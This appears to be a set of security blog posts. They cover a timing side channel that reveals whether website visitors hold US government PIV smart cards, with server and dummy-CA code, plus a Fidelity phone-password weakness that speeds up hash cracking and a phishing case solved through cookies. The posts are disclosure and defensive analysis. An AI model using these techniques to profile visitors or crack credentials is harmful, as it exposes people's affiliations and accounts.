There are wide variations in the quality and security of identification used to gain access to secure facilities where there is potential for terrorist attacks. In order to eliminate these variations, U.S. policy is to enhance security, increase Government efficiency, reduce identity fraud, and protect personal privacy by establishing a mandatory, Government-wide standard for secure and reliable forms of identification issued by the Federal Government to its employees and contractors […]

That “secure and reliable form of identification” became the basis for one of the largest PKI and smart-card deployments. Initially called CAC for “Common Access Card” and later superseded by PIV or “Personal Identity Verification,” these two programs combined for the issuance of millions of smart-cards bearing X509 digital certificates issued by a complex hierarchy of certificate authorities operated by the US government.

PIV cards were envisioned to function as “converged” credentials, combining physical access and logical access. They can be swiped or inserted into a badge-reader to open doors and  gain access to restricted facilities. (In more low-tech scenarios reminiscent of how Hollywood depicts access checks, the automated badge reader is replaced by an armed sentry who casually inspects the card before deciding to let the intruders in.) But they can also open doors in a more virtual sense online: PIV cards can be inserted into a smart-card reader or tapped against a mobile device over NFC to leverage the credential online. Examples of supported scenarios:

  • Login to a PC, typically using Active Directory and the public-key authentication extension to Kerberos
  • Sign/encrypt email messages via S/MIME
  • Access restricted websites in a web browser, using TLS client authentication.

This last capability creates an opening for remotely detecting whether someone has a PIV card— and, by extension, whether they are affiliated with the US government or one of its contractors.

Background on TLS client authentication

Most websites in 2024 use TLS to protect traffic from their customers against eavesdropping or tampering. This involves the site obtaining a digital certificate from a trusted certificate authority and presenting that credential to bootstrap every connection. Notably the customers visiting that website do not need any certificates of their own. Of course they must be able to validate the certificate presented by the website, but that validation step does not require any private, unique credential accessible only to that customer. As far as the TLS layer is concerned, the customer, or “client” in TLS terminology, is not authenticated. There may be additional authentication steps at a higher layer in the protocol stack, such as a web page where the customer inputs their email address and password. But those actions take place outside the TLS protocol.

While the majority of TLS interactions today are one-sided for authentication, the protocol also makes provisions for a mode where both sides authenticate each other, commonly called “mutual authentication.” This is typically done with the client also presenting an X509 certificate. (Being a complex protocol, TLS has other options including a “preshared key” model but those are rarely deployed.) At a high level, client authentication adds a few more steps to the TLS handshake (a minimal server-side sketch follows the list):

  • Server signals to the client that certificate authentication is required
  • Server sends a list of CAs that are trusted for issuing client certificates. Interestingly this list can be empty, which is interpreted as anything-goes
  • Client sends a certificate issued by one of the trusted anchors in that list, along with a signature on a challenge to prove that it is in control of the associated private key
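For a sense of what this looks like on the server side, here is a minimal Python sketch of a TLS server that requests, but does not require, a client certificate (file names and port are placeholders):

import socket
import ssl

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain("server.crt", "server.key")      # the server's own certificate
context.load_verify_locations("trusted_client_cas.pem")  # CA list advertised to clients
context.verify_mode = ssl.CERT_OPTIONAL                  # request, but do not require, a client cert

with socket.create_server(("0.0.0.0", 8443)) as listener:
    with context.wrap_socket(listener, server_side=True) as tls_listener:
        connection, _ = tls_listener.accept()
        # None or an empty dict when the visitor declined or had no matching certificate.
        print("client certificate:", connection.getpeercert())

This is the same “optional” mode mentioned below in the context of nginx: the handshake completes either way, and the application decides what to do with unauthenticated visitors.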

Handling privacy risks

Since client certificates typically contain uniquely identifying information about a person, there is an obvious privacy risk from authenticating with one willy-nilly to every website that demands a certificate. These risks have been long recognized and largely addressed by the design of modern web browsers.

A core privacy principle is that TLS client authentication can only take place with user consent. That comes down to addressing three different cases when a server requests a certificate from the browser:

  1. User has no certificate issued by any of the trust anchors listed by the server. In this case there is no reason to interrupt the user with UI; there is nothing actionable. Handshake continues without any client authentication. Server can reject such connections by terminating the TLS handshake or proceed in unauthenticated state. (The latter is referred to as optional mode, supported by popular web servers including nginx.)
  2. There is exactly one certificate meeting the criteria. Early web browsers would automatically use that certificate, thinking they were doing the user a favor by optimizing away an unnecessary prompt. Instead they were introducing a privacy risk: websites could silently collect personally identifiable information by triggering TLS client authentication and signaling that they would accept any certificate. (Realistically this “vulnerability” only affected a small percentage of users because client-side PKI deployments were largely confined to enterprises and government/defense sectors. That said, those also happen to be among the most stringent scenarios, where the customer cares a lot about operational security and privacy.)
    Browser designers have since seen the error of their ways. Contemporary implementations are consistent in presenting some UI before using the certificate. This is an important privacy control for users who may not want to send identifying information.
  • There is still one common UX optimization to streamline this: users can indicate that they trust a website and are always willing to authenticate with a specific certificate there. Firefox, for example, presents a checkbox for making that decision stick.
  3. Multiple matching certificates can be used. This is treated identically to case #2, with the dialog showing all available certificates for the user to choose from, or decline authentication altogether.

Detecting the existence of a certificate

Interposing a pop-up dialog appears to address privacy risks from websites attempting to profile users through client certificates. While any website visited can request a certificate, users remain in control of deciding whether their browser will go along with it. (And if the person complies and sends along their certificate to a website that had no right to ask? Historically browser vendors react to such cases with a time-honored strategy: blame the user— “PEBCAC! It’s their fault for clicking OK.”)

But even with the modal dialog, there is an information leak sufficient to enable shenanigans in the spirit of spot-the-Fed. There is a difference between case #1—no matching certificates— and remaining cases where there is at least one matching certificate. In the latter cases some UI is displayed, disrupting the TLS handshake until the user interacts with that UI to express their decision either way. In the former case, TLS connection proceeds without interruption. That difference can be detected: embed a resource that requires TLS client authentication and measure its load time.

While the browser is waiting for the user to make a decision, the network connection for retrieving the resource is stalled. Even if the user correctly decides to reject the authentication request, the page load time has been altered. (If they agree, timing differences are redundant: the website receives the full certificate, far more information than a timing signal could reveal.) The resulting delay is on the order of human reaction times— the time taken to process the dialog and click “cancel”— well within the resolution limits of the web Performance API.

Proof of concept: Spot-the-Fed

This timing check suffices to determine whether a visitor has a certificate from any one of a group of CAs chosen by the server. While the server will not find out the exact identity of the visitor— we assume he/she will cancel authentication when presented with the certificate selection dialog— the existence of a certificate alone is enough to establish affiliation. In the case of the US government PKI program, the presence of a certificate signals that the visitor has a PIV card.

Putting together a proof-of-concept:

  1. Collect issuer certificates for the US federal PKI. There are at least two ways to source this.
  2. Host a page on Github for the top-level document. It will include basic javascript to measure the time taken to load an embedded image that requires client authentication.
  3. Because Github Pages do not support TLS client authentication, that image must be hosted somewhere else. For example one can use nginx running on an EC2 instance to serve a one-pixel PNG image.
  4. Configure nginx for optional TLS client authentication, with trust anchors set to the list of CAs retrieved in step #1

There is one subtlety with step #4: nginx expects the full issuer certificates in PEM format. But if using option 1A above, only the issuer names are available. This turns out not to be a problem: since the TLS handshake only deals in issuer names, one can simply create a dummy self-signed CA certificate with the same issuer name but a brand new RSA key. For example, from login.gov we learn there is a trusted CA with the distinguished name “C=US, O=U.S. Government, OU=DoD, OU=PKI, CN=DOD EMAIL CA-72.” It is not necessary to have the actual certificate for this CA (although it is present in the publicly available bundles linked above); we can create a new self-signed certificate with the same DN to appease nginx. That dummy certificate will not work for successful TLS client authentication against a valid PIV card— the server can not validate a real PIV certificate without the public key of the real issuing CA. But that is moot; we expect users will refuse to go through with TLS client authentication. We are only interested in measuring the delay caused by asking them to entertain the possibility.
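Minting such a dummy CA takes a few lines with the cryptography package; a sketch, reusing the DN quoted above with a freshly generated (and otherwise meaningless) key:

from datetime import datetime, timedelta, timezone

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

# Reproduce only the distinguished name of the real issuer; the key is unrelated.
name = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, "US"),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, "U.S. Government"),
    x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, "DoD"),
    x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, "PKI"),
    x509.NameAttribute(NameOID.COMMON_NAME, "DOD EMAIL CA-72"),
])
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
now = datetime.now(timezone.utc)
cert = (
    x509.CertificateBuilder()
    .subject_name(name)
    .issuer_name(name)                      # self-signed: subject == issuer
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now)
    .not_valid_after(now + timedelta(days=365))
    .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
    .sign(key, hashes.SHA256())
)
with open("dummy_dod_email_ca72.pem", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.PEM))

The resulting PEM goes into the bundle handed to nginx, whose only job here is to echo those issuer names back to visitors in the certificate request.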

Limitations and variants

Stepping back to survey what this PoC accomplishes: we can remotely determine if a visitor to the website has a certificate issued by one of the known US government certificate authorities. This check does not require any user interaction, but it also comes with some limitations:

  • Successful detection requires that the visitor has a smart-card reader connected to their machine, their PIV card inserted in that reader and any middleware required to use that card installed. In practice, no middleware is required for the common case of Windows: PIV support has been built into the OS cryptography stack since Vista. Browsers including Chrome & Edge can automatically pick up any cards without requiring additional configuration. On other platforms such as MacOS and Linux additional configuration may be required. (That said: if the user already has scenarios requiring use of their PIV card on that machine, chances are it is already configured to allow the card to work in the browser without futzing with any settings.)
  • It is not stealthy in the case of successful identification. Visitors will have seen a certificate selection dialog come up. (Those without a client certificate however will not observe anything unusual.) That is not a common occurrence when surfing random websites. There are however a few websites (mis?)configured to demand client certificates from all visitors, such as this IPv6 detection page.
    • It may be possible to close the dialog without user interaction. One could start loading a resource that requires client authentication and later use javascript timers to cancel that navigation. In theory this will dismiss the pending UI. (In practice it does not appear to work in Chrome or Firefox for embedded resources, but works for top-level navigation.) To be clear, this does not prevent the dialog from appearing in the first place. It only reduces the time the dialog remains visible, at the expense of increased false-positives because detection threshold must be correspondingly lower.
    • A less reliable but more stealthy approach can be built if there is some website the target audience frequently logs into using their PIV card. In that case the attacker can attempt to source embedded content from that site— such as an image— and check if that content loaded successfully. This has the advantage that it will completely avoid UI in some scenarios. If the user has already authenticated to the well-known site within the same browser session, there will be no additional certificate selection dialogs. That signals the user has a PIV card because they are able to load resources from a site ostensibly requiring a certificate from one of the trusted federal PKI issuers. In some cases UI will be skipped even if the user has not authenticated in the current session, but has previously configured their web browser to automatically use the certificate at that site, as is possible with Firefox. (Note there will also be a PIN prompt for the smart-card— unless it has been recently used in the same browser session.)
  • While the PoC checks whether the user has a certificate from any one of a sizable collection of CAs, it can be modified to pinpoint the CA. Instead of loading a single image, one can load dozens of images in series from different servers each configured to accept only one CA among the collection. This can be used to better profile the visitor, for example to distinguish between contractors at Northrop Grumman (“CN=Northrop Grumman Corporate Root CA-384”) versus employees from the Department of Transportation (“CN=U.S. Department of Transportation Agency CA G4.”)
  • There are some tricky edge-cases involving TLS session resumption. This is a core performance improvement built into TLS to avoid time-consuming handshakes for every connection. Once a TLS session is negotiated with a particular server—with or without client authentication— that session will be reused for multiple requests going forward. Here that means loading the embedded image a second time will always take the “quick” route by using the existing session. Certificate selection UI will never be shown even if there is a PIV card present. Without compensating logic, that would result in false-negatives whenever the page is refreshed or revisited within the same session. This demonstration attempts to counteract that by setting a session cookie when PIV cards are detected and checking for that cookie on subsequent runs. In case the PoC is misbehaving, try using a new incognito/private window.

Work-arounds

The root cause of this information disclosure lies with the lack of adequate controls around TLS client authentication in modern browsers. While certificates will not be used without affirmative consent from the consumer, nothing stops random websites from initiating an authentication attempt.

Separate browser profiles are not necessarily effective as a work-around. At first it may seem promising to create two different Chrome or Edge profiles, with only one profile used for “trusted” sites set up for authenticating with the PIV card. But unlike cookie jars, digital certificates are typically shared across all profiles. Chrome is not managing smart-cards; the Windows cryptography API is responsible for that. That system has no concept of “profiles” or other boundaries invented by the browser. If a smart-card reader with a PIV card is attached, the magic of OS middleware will make it available to every application, including all browser profiles.

Interestingly, Firefox can serve as a somewhat clunky work-around because it uses the NSS library instead of the native OS API for managing certificates. While this is more a “bug” than a feature in most cases, due to the additional complexity of configuring NSS with the right PKCS#11 provider to use PIV cards, here it has a happy side-effect: it becomes possible to decouple availability of smart-cards in Firefox from Chrome/Edge. By leaving NSS unconfigured and only visiting “untrusted” sites with Firefox, one can avoid these detection tricks. (This applies specifically to Windows/MacOS where Chrome follows the platform API. It does not apply to Linux where Chrome also relies on NSS. Since there is a single NSS configuration in a shared location, both browsers remain in lock-step.) But it is questionable whether users can maintain such strict discipline to use the correct browser in every case. It would also cause problems for other applications using NSS, including Thunderbird for email encryption/signing.

Until there are better controls in popular browsers for certificate authentication, the only reliable work-around is relatively low-tech: avoid leaving a smart-card connected when the card is not being actively used. However this is impossible in some scenarios, notably when the system is configured to require smart-card logon and automatically lock the screen on card removal.

CP

Password management quirks at Fidelity

IVR Login

“Please enter your password.”

While this prompt commonly appears on webpages, it is not often heard during a phone call. This was not a social-engineering scam either: it was part of the automated response from the Fidelity customer support line. The message politely invites callers to enter their Fidelity password using the dial-pad, in order to authenticate the customer before connecting them to a live agent. There is one complication: dial-pads only have digits and two symbols, the star (asterisk) and pound keys. To handle the full range of symbols present in passwords, the instructions call for using the standard convention for translating letters into digits, helpfully displayed on most dial-pads:

Standard dial-pad, with mapping of letters to numbers
(Image from Wikipedia)

The existence of this process indicates a quirk in the way Fidelity stores passwords for their online brokerage service.

Recap: storing passwords without storing them

Any website providing personalized services is likely to have an authentication option that involves entering username and password. That website then has to verify whether the correct password is entered, by comparing the submitted version against the one recorded when the customer last set/changed their password.

Surprisingly there are ways to do that without storing the original password itself. In fact storing passwords is an anti-pattern. Even storing them encrypted is wrong: “encryption” by definition is reversible. Given encrypted data, there is a way to recover the original, namely by using the secret key in a decryption operation. Instead passwords are stored using a cryptographic hash-function. Hash functions are strictly one-way: there is no going back from the output to the original input. Unlike encryption, there is no magic secret key known to anyone— not even the person doing the hashing— that would permit reversing the process.

For example, using the popular hash function bcrypt, the infamous password “hunter2” becomes:

$2b$12$K1.sb/KyOqj6BdrAmiXuGezSRO11U.jYaRd5GhQW/ruceA9Yt4rx6

This cryptographic technique is a good fit for password storage because it allows the service to check passwords during login without storing the original. When someone claiming to be that customer shows up and attempts to login with what is allegedly their password, the exact same hash function can be applied to that submission. The output can be compared against the stored hash and if they are identical, one can conclude with very high probability that the submitted password was identical to the original. (Strictly speaking, there is a small probability of false positives: since hash functions are not one-to-one, in theory there is an infinite number of “valid” submissions that yield the same hash output. Finding one of those false-positives is just as difficult as finding the correct password, owing to the design properties of hash functions.)
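For example, with the python bcrypt package (a sketch; the work factor is illustrative):

import bcrypt

# At registration: hash the password with a random per-user salt and work factor 12.
stored = bcrypt.hashpw(b"hunter2", bcrypt.gensalt(rounds=12))

# At login: re-hash the submitted password (the salt is embedded in the stored value)
# and compare. The original password never needs to be stored anywhere.
print(bcrypt.checkpw(b"hunter2", stored))   # True
print(bcrypt.checkpw(b"hunter3", stored))   # False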

From a threat model perspective, one benefit of storing one-way hashes is that even if they are disclosed, an attacker does not learn the user credential and can not use it to impersonate the user. Because hashes are irreversible, the only option available to an attacker is to mount a brute-force attack: try billions of password guesses to see if any of them produce the same hash. The design of good hash-functions for password storage is therefore an arms-race between defenders and attackers. It is a careful trade-off between making hashing efficient enough for the legitimate service to process a handful of passwords quickly during a normal login process, while making it expensive enough to raise costs for an attacker trying to crack a hash by trying billions of guesses.

A miss is as good as a mile

Much ink has been spilled over the subtleties of designing good functions for password hashing. An open competition organized in 2013 sought to create a standardized, royalty-free solution for the community. Without going too much into the details of these constructions, the important property for our purposes is that good hash functions are highly sensitive to their input: change even one bit of the input password and the output changes drastically. For example, the passwords “hunter2” and “hunter3” literally differ in just one bit—the very last bit distinguishes the digit three from the digit two in ASCII code. Yet their bcrypt hashes look nothing alike:

Hash of hunter2 ➞ zSRO11U.jYaRd5GhQW/ruceA9Yt4rx6

Hash of hunter3 ➞ epdCpQLaQbcGTREZLZAFDKp5i/zQmp2

(One subtlety here: password hash functions including bcrypt incorporate a random “salt” value to make each hash output unique, even when they are invoked on the same password. To highlight changes caused by the password difference, we deliberately used the same salt when calculating these hashes above and omitted the salt from the displayed value. Normally it would appear as a prefix.)

Bottom line: there is no way to check if two passwords are “close enough” by comparing hash outputs. For example, there is no way to check if the customer got only a single letter of the password wrong or if they got all the letters correct except for the lower/upper-case distinction. One can only check for exact equality.

The mystery at Fidelity

Having covered the basics of password hashing we can now turn to the unusual behavior of the Fidelity IVR system. Fidelity is authenticating customers by comparing against a variant of their original password. The password entered on the phone is derived from, but not identical to, the one used on the web. That check can not be performed against a strong cryptographic hash of the original password: a proper hash function suitable for password storage would erase any semblance of similarity between the two versions.

There are two possibilities:

  1. Fidelity is storing passwords in a reversible manner, either directly as clear-text or in an encrypted form where they can still be recovered for comparison.
  2. Fidelity is canonicalizing passwords before hashing, converting them to the equivalent “IVR format” consisting of digits before applying the hash function.

It is not possible to distinguish between these, short of having visibility into the internal design of the system.

But there is another quirk that points towards the second possibility: the website and mobile apps also appear to validate passwords against the canonicalized version. A customer with the password “hunter2” can also login using the IVR-equivalent variant “HuNt3R2”.

Implications

IVR passwords are much weaker than expected against offline cracking attacks. While seemingly strong and difficult to guess, the password iI.I0esl>E`+:P9A is in reality equivalent to the less impressive 4404037503000792.

The notion of entropy can help quantify the problem. A sixteen character string composed of randomly selected printable ASCII characters has an entropy around 105 bits. That is a safety margin far outside the reach of any commercially motivated attacker. Now replace all of those 16 characters by digits and the entropy drops to 53 bits— or about nine quadrillion possibilities, which is surprisingly within range of hobbyists with home-brew password cracking systems.

In fact entropy reduction could be worse depending on exactly how users are generating passwords. The mapping from available password symbols to IVR digits is not uniform:

  • Only the character 1 maps to the digit 1 on the dial-pad.
  • Seven different characters (A, B, C, a, b, c, 2) are mapped to the digit 2
  • By contrast there are nine different symbols mapping to the digit 7, due to the presence of an extra letter for that key on the dial-pad
  • Zero is even more unusual in that all punctuation marks and special characters get mapped to it, for more than 30 different symbols in total

In other words, a customer who believes they are following best practices, using a password manager application and having it generate a “random” 16-character password, will not end up with a uniformly distributed IVR password. Zeroes will be significantly over-represented due to the bias in the mapping while the digit one will be under-represented.
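A sketch of that canonicalization, assuming the standard keypad letter groupings (it reproduces the example above):

import string

# Standard dial-pad groupings; anything that is not a letter or digit maps to 0.
KEYPAD = {"2": "abc", "3": "def", "4": "ghi", "5": "jkl",
          "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz"}
LETTER_TO_DIGIT = {letter: digit for digit, letters in KEYPAD.items() for letter in letters}

def to_ivr(password: str) -> str:
    return "".join(
        ch if ch in string.digits else LETTER_TO_DIGIT.get(ch, "0")
        for ch in password.lower()
    )

print(to_ivr("iI.I0esl>E`+:P9A"))               # 4404037503000792
print(to_ivr("hunter2") == to_ivr("HuNt3R2"))   # True: why the variant also logs in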

The second design flaw here involves carrying over the weakness of IVR passwords to the web interface and mobile applications. While the design constraints of phone-based customer support require accepting simplified passwords, it does not follow that the web interface should also accept them. (This assumes the web interface grants higher privileges, in the sense that certain actions can only be carried out by logging into the website— such as adding bank accounts and initiating funds transfers— and are not possible through IVR.)

Consider an alternative design where Fidelity asks customers to pick a secondary PIN for use on the phone. In this model there are two independent credentials. There is the original password used when logging in through the website or mobile apps. It is case-sensitive and permits all symbols. An independent PIN consisting only of digits is selected by customers for use during phone authentication. Independent being the operative keyword here: it is crucial that the IVR PIN is not derived from the original password via some transformation. Otherwise an attacker who can recover the weak IVR PIN can use that to get a head-start on recovering the full password.

Responsible disclosure

This issue was reported to the Fidelity security team in 2021. This was their response:

“Thank you for reaching out about your concerns, the security of your personal information is a primary concern at Fidelity. As such, we make use of industry standard encryption techniques, authentication procedures, and other proven protection measures to secure your information. We regularly adapt these controls to respond to changing requirements and advances in technology. We recommend that you follow current best practices when it comes to the overall security of your accounts and authentication credentials. For further information, you can visit the Security Center on your Fidelity.com account profile to manage your settings and account credentials.”

Postscript: why storing two hashes does not help

To emphasize the independence requirement, we consider another design and explain why it does not achieve the intended security effect. Suppose Fidelity kept the original design for a single password shared between web and IVR, but hashed it two ways:

  • First is a hash of the password verbatim, used for web logins.
  • Second is a hash of the canonicalized password, after being converted to IVR form by mapping all symbols to digits 0 through 9. This hash is only checked when the customer is trying to login through the phone interface.

This greatly weakens the full password against offline cracking because the IVR hash provides an intermediate stepping stone to drive guessing attacks against the full credential. We have already pointed out that the entropy in all-numeric PINs is very low for any length customers could be expected to key into a dial-pad. The additional problem is that after recovering the IVR version, the attacker now has a much easier time cracking the full password. Here is a concrete example: suppose an attacker mounts a brute-force attack against the numeric PIN and determines that a stolen hash corresponds to “3695707711036959.” That data point is very useful when attempting to recover the full password, since many guesses are not compatible with that IVR version. For example, the attacker need not waste any CPU cycles hashing the candidate password “uqyEzqGCyNnUCWaU.” That candidate starts with “u”, which would map to the digit “8” on a dial-pad. It would be inconsistent with something the attacker already knows: the first character of the real password maps to 3, based on the IVR version. Working backwards from the same observation, the attacker knows that they only need to consider guesses where the first symbol is one of {3, d, e, f, D, E, F}.

This makes life much easier for an attacker trying to crack hashes. The effort to recover a full password is not even twice the amount required to go after the IVR version. Revisiting the example of 16 character random passwords: we noted that unrestricted entries have about 105 bits of entropy while the corresponding IVR version is capped to around 53 bits. That means once the simplified IVR PIN is recovered by trying 2**53 guesses at most, the attacker only needs another 2**(105-53) == 2**52 guesses to hit on the full password. This is only about 50% more incremental work— and on average the correct password will be discovered halfway through the search. In other words, having a weak “intermediate” target to attack has turned an intractable problem (2**105 guesses) into two eminently solvable sub-problems.

CP

Saved by third-party cookies: when phishing campaigns make mistakes

(Or, that rare instance when third-party cookies actually helped improve security.)

Third-party cookies have earned a bad reputation for enabling widespread tracking and advertising-driven surveillance online— one that is entirely justified. After multiple half-hearted attempts to deprecate them by leveraging its browser monopoly with Chrome, even Google eventually threw in the towel. Not to challenge that narrative, but this post describes an unusual incident where third-party cookies actually helped protect consumers from an ongoing phishing attack. While this phishing campaign occurred in real life, we will refer to the site in question as Acme, after the hypothetical company in the Wile E Coyote cartoons.

Recap on phishing

Phishing involves creating a look-alike replica of a legitimate website in order to trick customers into disclosing sensitive information. Common targets are passwords, which can be used to login to the real website by impersonating the user. But phishing can also go after personally identifiable information such as credit-card or social-security numbers directly, since those are often monetizable on their own. The open nature of the web makes it trivial to clone the visual appearance of websites for this purpose. One can simply download every image, stylesheet and video from that site, stash the same content on a different server controlled by the attacker and point users into visiting this latter copy. (While this sounds sinister, there are even legitimate use cases for it, such as mirroring websites to reduce load or protect them from denial-of-service attacks.)

The important point to remember is that visuals can be deceptive: the bogus site may render pixel-for-pixel identical inside the browser view. The address bar is one of the only reliable clues to the provenance of the content; that is because it is part of the user interface controlled 100% by the browser. It can not be manipulated by the attacker. But good luck spotting the difference between login.acme.com, loginacme.com, acnne.com or any of the dozen other surprising ways to confuse the unwary. Names that look “close” at the outset can be controlled by completely unrelated entities, thanks to the way DNS works.

What makes phishing so challenging to combat is that the legitimate website is completely out of the picture at the crucial moment the attack is going on. The customer is unwittingly interacting with a website 100% controlled by an adversary out to get them, while under the false impression that they are dealing with a trusted service they have been using for years. Much as the real site may want to jump in with a scary warning dialog to stop their customer from making a crucial judgment error, there is no opportunity for such interventions. Recall that the customer is only interacting with the replica. All content the user sees is sourced from the malicious site, even if it happens to be a copy of content originally copied from the legitimate one.

Rookie mistake

Unless, that is, the attacker makes a mistake. That is what happened with the crooks targeting Acme: they failed to clone all of the content and create a self-contained replica. One of the Acme security team members noticed that the malicious site continued to reference content hosted on the real one. Every time a user visited the phishing site, their web browser was also fetching content from the authentic Acme website. That astute observation paved the way for an effective intervention.

In this particular phishing campaign, the errant reference back to the original site was for a single image used to display a logo. That is not much to work with. On the one hand, Acme could detect when the image was being embedded from a different website, thanks to the HTTP Referer [sic] header. (Incidentally referrer-policies today would interfere with that capability.) But this particular image consumed precious little screen real estate, only measuring a few pixels across. One could return an altered image— skull and crossbones, mushroom cloud or something garish— but it is very unlikely users would notice. Even loyal customers who have the Acme logo committed to memory might not think twice if a different image appears. Instead of questioning the authenticity of the site, they would attribute that quirk to a routine bug or misguided UI experiment.

It is not possible to influence the rest of the page by returning a corrupt image or some other type of content. For example it is not possible to prevent the page from loading or redirect it back to the legitimate login page. Similarly one can not return some other type of content such as javascript to interrupt the phishing attempt or warn users. (Aside: if the crooks had made the same mistake by sourcing a javascript file from Acme, such radical interventions would have been possible.)

Remember me: cookies & authentication

To recap, this is the situation Acme faces:

  1. There is an active phishing campaign in the wild
  2. A game of whack-a-mole ensues: the Acme security team keeps reporting each site to browser vendors, hosting companies and Cloudflare. (Crooks are fond of using Cloudflare because it acts as a proxy sitting in front of the malicious site, disguising its true origin and making it difficult for defenders to block it reliably.) The attacker responds by changing domain names and resurfacing the exact same phishing page under a different domain name.
  3. Every time a customer visits a phishing page, Acme can observe the attack happening in real time because its servers receive a request
  4. Despite being in the loop, Acme can not meaningfully disrupt the phishing page. It has limited influence over the content displayed to the customer

Here is the saving grace: when the customer’s browser reaches out to the legitimate Acme website in step #3 while rendering the phishing page, it sends along all Acme cookies. Some of those cookies contain information that uniquely identifies the specific customer. That means Acme learns not only that some customer visited a phishing site, but exactly which customer did. In fact there were at least two such cookies:

  • A “remember me” cookie used to store the email address and expedite future logins by pre-filling the username field in login forms.
  • Authentication cookies set after login. Interestingly, even expired cookies are useful for this purpose. Suppose Acme only allowed login sessions to last for 24 hours. After the clock runs out, the customer must reauthenticate by providing their password or MFA again. Authentication cookies would have embedded timestamps reflecting that restriction. In keeping with the policy of requiring “fresh” credentials, after 24 hours the cookie would no longer be sufficient for authenticating the user. But for the purpose of identifying which user is being phished, it works just fine. (Technical note: “expired” here refers to the application logic; the HTTP standard itself defines an expiration time for cookies, after which the browser deletes the cookie. A cookie expired in that sense would not be of much use— it becomes invisible to the server.)

This gives Acme a lucky break to protect customers from the ongoing phishing attack. Recall that Acme can detect when an incoming request for the image is associated with the phishing page. Whenever that happens, Acme can use the accompanying cookies to look up exactly which customer has stumbled onto the malicious site. To be clear, Acme can not determine conclusively whether the customer actually fell for the phish and disclosed their credentials. (There is a fighting chance the customer notices something off about the page and stops short of giving away their password. Unfortunately that can not be inferred remotely.) As such Acme must operate on the worst-case assumption that phishing will succeed and place preemptive restrictions on the account, such as temporarily suspending logins or restricting dangerous actions. That way, even if the customer does disclose their credentials and the crooks turn around to “cash in” by logging into the genuine Acme website, they will be thwarted from achieving their objective.

Third-party stigma for cookies

There is one caveat to the availability of the cookies required to identify the affected customer: those cookies are now being replayed in a third-party context. Recall that the first- vs third-party distinction is all about context: whether a resource (such as an image) being fetched for inclusion on a webpage comes from the same site as the page embedding it, known as the “top-level document.” When an image is fetched as part of a routine visit to the Acme website, it is a first-party request because the image is hosted at the same origin as the top-level document. But when it is retrieved by following a reference from the malicious replica, it becomes a third-party request.

Would existing Acme cookies get replayed in that situation and reveal the identity of the potential phishing victim? The answer depends on multiple factors:

  1. Choice of browser. At the time of this incident, most popular web browsers freely replayed cookies in third-party contexts, with two notable exceptions:
    • Safari suppressed cookies when making these requests.
    • Internet Explorer: as the lone browser implementing P3P, IE would automatically “leash” cookies set without an associated privacy policy: the cookies would be accepted, but only replayed in first-party contexts.
  2. User overrides to browser settings. While the preceding section describes the default behavior of each browser, users can modify these settings to make them more or less stringent.
  3. Use of the “samesite” attribute. About 15 years after IE6 inflicted P3P and cookie management on websites, a proposed update to the HTTP cookie specification finally emerged to standardize and generalize its leashing concept. But the script was flipped: instead of browsers making unilateral decisions to protect user privacy, website owners would declare whether their cookies should be made available in third-party contexts. (Marking a cookie SameSite=Strict or SameSite=Lax keeps it out of cross-site requests such as the image fetch described here, while SameSite=None opts back into third-party replay.) One can imagine which way advertising networks— crucially dependent on third-party cookie usage for their ubiquitous surveillance model— leaned on that decision.

Luckily for Acme, the relevant cookies here were not restricted by the samesite attribute. As for browser distribution, IE was irrelevant: its market share was in the single digits, confined mostly to enterprise users in managed IT environments, a far cry from Acme’s target audience. Safari, on the other hand, did have a non-negligible share, especially among mobile clients, since Apple did not allow independent browser engines on iOS at the time; alternatives such as Chrome were required to wrap the same WebKit engine. (That restriction would only be lifted in 2024, when the EU reset Apple’s expectations around monopolistic behavior.)

In the end, it was possible to identify and take evasive action on behalf of the vast majority of customers known to have visited the malicious website. More importantly, intelligence gathered from one interaction is frequently useful in protecting other customers, even when the latter are not directly identified as being targeted by an attack. For example, an adversary often has only a handful of IPv4 addresses available when attempting to cash in stolen credentials. When an IP address is observed attempting to impersonate a known phishing victim, every other login from that IP can be treated with heightened suspicion. Detection mechanisms can be invaluable even with less than 100% coverage.

Verdict on third-party cookies 

Does this prove that third-party cookies have some redeeming virtue, and that the web will be less safe when— or at this rate, if— they are fully deprecated? No. This anecdote is more the exception proving the rule. The advertising industry has been rallying in defense of third-party cookies for over a decade, spinning increasingly desperate and far-fetched scenarios. From the alleged death of “free” content (more accurately, ad-supported content, where the real product being peddled is the audience’s eyeballs for ad networks) to allegedly reduced capability for detecting fraud and malicious activity online, predictions of doom have been a constant part of the narrative.

To be clear: this incident does not in any way provide more ammunition for such thinly-veiled attempts at defending a fundamentally broken business model. For starters, there is nothing intrinsic to phishing attacks that requires help from third-party cookies for detection. The crooks behind this particular campaign made an elementary mistake: they left a reference to the original site when cloning the content for their malicious replica. There is no rule that says other crooks are required to follow suit. While that optimistic assumption is built into defense strategies such as canary tokens, new web standards have made such mistakes increasingly easy to avoid. For example, content security policy (CSP) allows a website to delineate precisely which other sites may be contacted when fetching embedded resources. It would have been a trivial step for the crooks to add a CSP header along the lines of Content-Security-Policy: default-src 'self', preventing any accidental references back to the original domain and neutralizing any javascript logic lurking there to alert defenders.

Ultimately the only robust solution for phishing is using authentication schemes that are not vulnerable to phishing. The defense and enterprise sectors have always had the option of deploying PKI with smart cards for their employees. More recently, consumer-oriented services have gained convenient access to a (greatly watered-down) version of that capability with passkeys. The jury is out on whether passkeys will gain traction or remain consigned to a niche audience, owing to the morass of confusing, incompatible implementations.

CP

QCC: Quining C Compiler

Automating quine construction for C

